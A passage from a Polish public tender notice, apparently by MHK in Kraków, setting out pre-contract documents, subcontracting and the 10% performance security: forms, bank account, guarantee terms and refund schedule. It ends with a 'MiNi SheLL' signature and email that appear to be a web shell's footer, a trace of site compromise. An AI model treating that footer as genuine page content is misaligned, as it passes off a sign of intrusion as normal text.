2.	Osoby reprezentujące Wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich umocowanie do podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.
3.	W przypadku wyboru oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający będzie żądać przed zawarciem umowy przedstawienia umowy regulującej współpracy tych wykonawców. 
4.	Przed podpisaniem umowy Wykonawca jest zobowiązany przedstawić Zamawiającemu następujące dokumenty:
a)	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli wykonawcą jest przedsiębiorca wpisany do ewidencji działalności gospodarczej.
b)	Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia nie mniejszej niż 4.000.000,00 zł (słownie: cztery miliony złotych)
c)	Dokumenty potwierdzające posiadanie wymaganych uprawnień w zakresie opisanym w nin. SIWZ dla:
- kierownika robót budowlanych,
- kierownika prac konserwatorskich (jeżeli dotyczy)


Zamawiający dopuszcza aby Wykonawca powierzył podwykonawcom realizację przedmiotu zamówienia, w tym celu należy złożyć odpowiednie oświadczenie 
w formularzu oferty.
Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy.

Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy.

Informacja o zabezpieczeniu:

1)	Zgodnie z dyspozycją art. 147 ustawy Zamawiający żąda zabezpieczenia należytego wykonania umowy na przedmiot zamówienia określony 
w ZAŁĄCZNIKU NR 1 do SIWZ - OPISIE PRZEDMIOTU ZAMÓWIENIA
2)	Zabezpieczenie to służyć będzie pokryciu ewentualnych roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
3)	Zamawiający żąda od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy przed dniem zawarcia umowy - pod rygorem jej nie podpisania, w wysokości:
10 % wartości umowy brutto
4)	Zgodnie z dyspozycją art. 148 ustawy zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:

a.	Pieniądzu - OBOWIĄZKOWO PRZELEWEM;

na konto:
Banku PEKAO S.A 			62 1240 1431 1111 0010 1944 5624

Wniesienie zabezpieczenia w pieniądzu Zamawiający uznaje za skuteczne, jeżeli jest ono wniesione tj. znajdzie się na rachunku bankowym Zamawiającego - data uznania rachunku Zamawiającego - przed upływem terminu zawarcia umowy.
Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.
Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Uwaga:
Odpowiedni dokument, o którym mowa w lit. b, c, d, e, musi zostać złożony w pokoju nr 10 - Księgowość - Kasa MHK w głównej siedzibie MHK (Rynek Główny 35, Kraków 31-011, IIIp.) - przed upływem terminu wyznaczonego na podpisanie umowy.

Zabezpieczenie wnoszone w formie gwarancji bankowej lub poręczenia banku albo spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji ubezpieczeniowej, czy też poręczenia udzielonego przez podmioty, o których mowa w lit. e powinno zawierać następujące elementy:

a.	określenie kwoty poręczenia,
b.	wskazanie gwaranta poręczenia ,
c.	wskazanie beneficjenta poręczenia,
d.	zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta, w terminie do 30 dni,
e.	nieodwołalność poręczenia.

Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w innej formie 
tj. w formach, o których mowa w art. 148 ust. 2 ustawy.

5)	Dalsze informacje dotyczące zabezpieczenia:
a.	W trakcie realizacji umowy wykonawca będzie mógł dokonać zmiany formy zabezpieczenia o ile zaistnieje taka potrzeba na jedną lub kilka form, 
o których mowa w art. 148 ust. 1 ustawy. Zmiana formy zabezpieczenia będzie musiała być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.
b.	W terminie 30 dni od dnia podpisania protokołu odbioru całości prac Zamawiający zobowiązuje się zwrócić Wykonawcy 70% kwoty zabezpieczenia należytego wykonania umowy
c.	W terminie 15 dni od dnia upływu okresu rękojmi za wady, Zamawiający zobowiązuje się zwrócić Wykonawcy 30% kwoty zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com